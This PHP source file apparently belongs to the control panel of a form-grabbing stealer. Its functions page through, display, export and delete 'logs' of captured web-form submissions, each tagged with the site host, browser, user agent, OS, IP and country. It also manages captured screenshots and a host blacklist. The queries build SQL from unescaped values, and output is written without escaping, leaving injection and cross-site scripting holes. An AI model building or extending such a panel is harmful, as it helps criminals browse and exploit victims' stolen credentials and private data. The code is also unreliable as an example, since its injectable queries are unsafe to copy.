<?php
//FUNCTIONS ////////////////////////////////////////////////////////////////////
function ShowLog($fb, $logType, $tableHeadType)
{
    $logsPerPage = $fb->panel->logsPerPage;
    $title = $fb->panel->str['pageHead'][$logType];
    
    $page = 0;
    $html = $tableHeadType;
    $result = mysqli_query($fb->mysql, "SELECT COUNT(*) FROM ".$logType);
    $logstotal = mysqli_result($result);
    
    if( has_get("act") && get("act") == "clear".$logType ) 
    {
	if($logstotal > 0) 
        { 
            if( !Perm(3) ) { header("Location: ?action=".$logType); exit(); }
            mysqli_query($fb->mysql, "DELETE FROM ".$logType);
            
            if( $logType == "screenshots" ) {
                foreach( glob('script/screen/*') as $file )  { 
                    unlink($file); 
                }
            }
        }
        mysqli_close($fb->mysql);//Debuger Bug in SqliDriver not fixable..
        header("Location: ?action=".$logType);
    }
    
    if( has_get("page") ) {
        $page = get("page");
    }else { $page = $_SESSION[$logType."Page"]; }
    
    if($logType == "logs" && $fb->panel->str['Colum'][$_SESSION["sort"]] == "host"){$_SESSION["sort"]=4;}
    
    if($logstotal > 0)
    {
        if( is_numeric($page) && $page >= 0 && $page <= ceil($logstotal / $logsPerPage)) {
            $_SESSION[$logType."Page"] = $page;
        }else { $_SESSION[$logType."Page"] = 0; }
        
        $queryStr = "SELECT * FROM ".$logType." ORDER BY `".$fb->panel->str['Colum'][$_SESSION["sort"]]."` ".sort_order().
                    " LIMIT ".($logsPerPage * $_SESSION[$logType."Page"])." , ".$logsPerPage.";";
        $result = mysqli_query($fb->mysql, $queryStr);
        if(!$result)  {
            die(mysqli_error($fb->mysql));
            exit();
        }
        
        $html .= TableLogs($result, $logType);
        
        $html .= "</tbody></table><div id='pages'><div id='numbers'>" .pages_number($logstotal, $logsPerPage, $logType). 
        "</div><div id='buttons'>"."<input type='hidden' name='logtype' value='".$logType."'/>".$fb->panel->str['footBtn'];
    } 
    else {
        mysqli_close($fb->mysql);//Debuger Bug in SqliDriver not fixable..
        show($fb->panel->str['bodyHeader']."<h3>".$fb->str['head_str']['nocontent']."</h3>".
                $fb->str['footer']."</div>", $title);
    }
    mysqli_close($fb->mysql);//Debuger Bug in SqliDriver not fixable..
    show($fb->panel->str['bodyHeader'].$html.$fb->str['footer']."</div>", $title);
}


function pages_number($logstotal, $logsperpage, $logType)
{
    $pagesnumber = ceil($logstotal / $logsperpage);
    $temp  = "Pages: ";
    for ($i = 0; $i < $pagesnumber; $i++) {
        if ($_SESSION[$logType."Page"] == $i)
        {
            $temp .= " <span class='page1'>" .$i. "</span>";
        }
        else {
            $temp .= " <span class='page0'><a href='?action=".$logType."&page=" .$i. "'>" .$i. "</a></span>";
        }
    }
    $temp .= " Results " .($_SESSION[$logType."Page"] * $logsperpage). " - " 
            .(($_SESSION[$logType."Page"] * $logsperpage) + $logsperpage). " of about " .$logstotal;
    return $temp;
}

function doBlacklist($fb, $host, $comment)
{
    $note = str_replace("'", "[q]", $comment);
    $result = mysqli_query($fb->mysql, "SELECT * FROM blacklisted WHERE `host` = '"
                                       .$host."' AND `comment` = '".$note."';");
    if (!$result){
        header("Location: ?action=settings&blk=error");
        exit;
    }
    if (mysqli_num_rows($result) == 0) {
        if( !Perm(2) ) { header("Location: ?action=settings"); exit(); }
        $result = mysqli_query($fb->mysql, "INSERT INTO blacklisted (`id`, `host`, `comment`) "
                               . "VALUES (0, '".$host."','".$note."')");
    }
    mysqli_close($fb->mysql);//Debuger Bug in SqliDriver not fixable..
    header("Location: ?action=settings");
    exit();
}

function gotoSettings($fb)
{
    $hoststotal = 0;
    getBlacklist_str( $fb );
    $err = $fb->panel->str['err'];
    $html = $fb->panel->str['blackList'];
    $bHead = $fb->panel->str['bodyHeader'];
    $title = $fb->panel->str['pageHead']['settings'];
    $result = mysqli_query($fb->mysql, "SELECT COUNT(*) FROM blacklisted");
    
    if($result) {
        $hoststotal = mysqli_result($result);
    }
    if($hoststotal > 0) 
    {
        $result = mysqli_query($fb->mysql, "SELECT * FROM blacklisted");
        if (!$result) {
            die(mysqli_error());
        }				
        $i = 0;
        while ($row = mysqli_fetch_array($result)) {
            $html .= "<tr>";
            $html .= "<td>" .$row["host"]. "</td>";
            $html .= "<td>" .$row["comment"]. "</td>";
            
            $html .= "<td><input type='checkbox' name='sel[]' value='" . $row["id"] . "'></td></tr>";
            $i++;
        }
        $html .= $fb->panel->str['Blackfoot'].$fb->panel->str['blackForm'];
    } 
    else {
        if(has_get("blk") && get("blk")==("error"))
        {
            $blkErr = "<h3>".$err['blkErr']."</h3>";
            show($bHead."<h3>".$err['blkErr2']."</h3>".$fb->panel->str['blackForm'].$blkErr.$fb->str['footer']."</div>", $title);
        }
        show($bHead."<h3>".$err['blkErr2']."</h3>".$fb->panel->str['blackForm'].$fb->str['footer']."</div>", $title);
    }
    
    if(has_get("blk") && get("blk")==("error"))
    {
        show($bHead.$html."<h3>".$err['blkErr']."</h3>".$fb->str['footer']."</div>", $title);
    }
    show($bHead.$html.$fb->str['footer']."</div>", $title);
}

function doSelection($fb)
{   
    require_once 'fb_Export.php';
    $err = $fb->panel->str['err']['unerr'];
    $bHead = $fb->panel->str['bodyHeader'];
    
    if( has_post("selectact") && has_post("sel") && count(aray("sel")) != 0)
    {
        if( post("selectact") == "exportselected")
        {
            if( !Perm(2) ) 
            { if ( has_post("act") && post("act") == "SearchPage") { $_SESSION["pmSearch"]=post("logtype"); } }
            exportLogs( $fb, post("logtype") ); exit();
        }
        elseif( post("selectact") == "deletetselected")
        {
            $dbname = post("logtype");
        } else {
            $dbname = "blacklisted";
        }
        
        $selArray = aray("sel");
        
        if( !Perm(2) ) 
        { 
            if ( has_post("act") && post("act") == "SearchPage") { $_SESSION["pmSearch"]=post("logtype"); }
            header("Location: ".server('HTTP_REFERER')); exit(); 
        }
        
        if( $dbname == "screenshots") { 
            require_once 'fb_Screenshots.php';
            DeleteImage($fb, $dbname, $selArray); 
        }
        
        $result = select_id_list($fb, $dbname, $selArray, "DELETE");
        
        if (!$result) {
            show($bHead.$err.$fb->str['footer']."</div>", $err);
        }
        
        if ( has_post("act") && post("act") == "SearchPage") {
            doSearch( post("logtype") ); exit();
        }
        elseif ( post("selectact") == "deletetselected") {
            header("Location: ?action=".post("logtype")); exit();
        } 
        else {
            header("Location: ?action=settings"); exit();
        }
    }
    else {
        show($bHead.$err.$fb->str['footer']."</div>", $err); exit();
    }
}

function TableLogs($result, $logType)
{
    global $fb;
    $Browz = $fb->panel->str['Browsers'];
    $html = '';
    $tbContent = "<td> <h5><input type='checkbox' value='";
    $dshot = "' data-short='";
    $dlong = "' data-long='";
    $divClose = "</div></td>";
    $click = "' onclick='tabClick(this.value)'> <span style='color:#990012'>tab:</span></h5> <div value='0' id='Tab";
    
    $Tabledcontent = '';
    $fullRawcontent = '';
    $shortRawcontent = '';
    $Country = '';
    
    $agent = "null";
    $val = 0; $HostRef = NULL; $Browser = NULL; 
    while ($row = mysqli_fetch_array($result)) 
    {
        if( array_key_exists("countryNumber", $row) ){ $Country = $row["countryNumber"]; }
        
        if($logType == "logs")
        {
            if(substr($row["host"],0,7) != "http://") { $row["host"] = "http://".$row["host"]; }
            $Tabledcontent = CreateContentTable($row["content"]);
            $fullRawcontent = MarkParameterName($row["content"],false);
            $shortRawcontent = MarkParameterName($row["content"],true)."...";
            $Browser = "<td>".$Browz[$row["browser"]]."</td>";
            $HostRef = "<td> <a href='".$row["host"]."' target='_blank'>".$row["host"]."</a></td>";
            if( isset($row["agent"]) ){ $agent = $row["agent"]; }
        }
        elseif($logType == "screenshots")
        {
            $imgStr = "<td><p><table width='100%' border='0'><tr><td  width='45%'><h4>
                    <a href='?action=screenshots&view=".$row["content"]."' target='_blank'>".$row["content"]."</a></h4></td>
                    <td><a href='?action=screenshots&view=".$row["content"]."' target='_blank'>
                    <img src='script/img/misc/view.png' alt=''/></a></td>
                    <td>&emsp; <input id='".$row["content"]."' type='submit' value='Download Image' 
                    onclick='if(!imgDownload(this.id)) return false;'></td></tr></table>
                    </p></td>";
            $fullRawcontent = $imgStr;
            $HostRef = ''; $Browser = '';
        }
        else
        {
            $Tabledcontent = str_replace("\r\n", "<BR>", $row["content"]);
            $fullRawcontent = $Tabledcontent;
            $shortRawcontent = substr($row["content"],0,80)."...";
            $HostRef = ''; $Browser = '';
        }
        
        $html .= "<tr>".$Browser.$HostRef;
        
        if($logType == "screenshots")
        {
            $html .= $fullRawcontent;
        }
        elseif (strlen($row["content"]) > 80) 
        {
            $html .= $tbContent.$val.$click.$val.$dshot.$shortRawcontent.$dlong.$Tabledcontent."'>".$shortRawcontent.$divClose;
        } 
        else 
        {
            $html .= $tbContent.$val.$click.$val.$dshot.$fullRawcontent.$dlong.$Tabledcontent."'>".$fullRawcontent.$divClose;
        }
        $html .= "<td>" .getOst($row). "</td>";
        
        $html .= "<td>" .$row["user"]. "</td>";
        if($logType == "logs"){ $html .= "<td>" .$agent. "</td>"; }
        $html .= "<td>" .$row["date"]. "</td>";
        
        $html .= "<td>" .getCountry($Country). "</td>" . 
                 "<td>" .getFlag($Country). "</td>" . "<td>" .$row["ip"]. "</td>";
        
        $html .= "<td><input type='checkbox' name='sel[]' value='".$row["id"]."'></td></tr>";
        $val++;
    }
    
    return $html;
}

function CreateContentTable($str) 
{
    $output = NULL; 
    parse_str($str, $output);
    
    $retstr = "<table>";
    foreach ($output as $key => $value) {
        if ($value != "" && (array)$value !== $value) {
            $retstr .= "<tr><td><strong>" .$key. "</strong></td><td>" .$value. "</td></tr> \n";
        }
    }
    $retstr .= "</table>";
    return $retstr;    
}

function MarkParameterName($str, $limit)
{
    $output = NULL; $retstr ='';
    if ($limit) {
        parse_str(substr($str,0,80), $output);
    } 
    else {
        parse_str($str, $output);
    }
    
    foreach ($output as $key => $value) {
        if ( (array)$value !== $value ) 
        {
            $retstr .= "<strong>" .$key. "</strong>=" .$value."&";
        }
    }
    return substr($retstr,0,strlen($retstr)-1);   
}

function setSort($sort)
{
    if( !$sort || $sort>6 || $sort<0 ) { return; }
    
    if ( $sort == $_SESSION["sort"] ) {
        if ($_SESSION["order"] == 0) {
            $_SESSION["order"] = 1;
        }
        else {
            $_SESSION["order"] = 0;
        }
    }
    else {
        $_SESSION["sort"] = $sort;
    }
}

function mysqli_result($res,$row=0,$col=0)
{ 
    if(!$res) { return false; }
    
    $numrows = mysqli_num_rows($res); 
    if ($numrows && $row <= ($numrows-1) && $row >=0){
        mysqli_data_seek($res,$row);
        $resrow = (is_numeric($col)) ? mysqli_fetch_row($res) : mysqli_fetch_assoc($res);
        if (isset($resrow[$col])){
            return $resrow[$col];
        }
    }
    return false;
}

function EmptyJunk($logstotal, $mysql) 
{
    if($logstotal > 0)
    {
        mysqli_query($mysql, "DELETE * FROM junk");
    }
}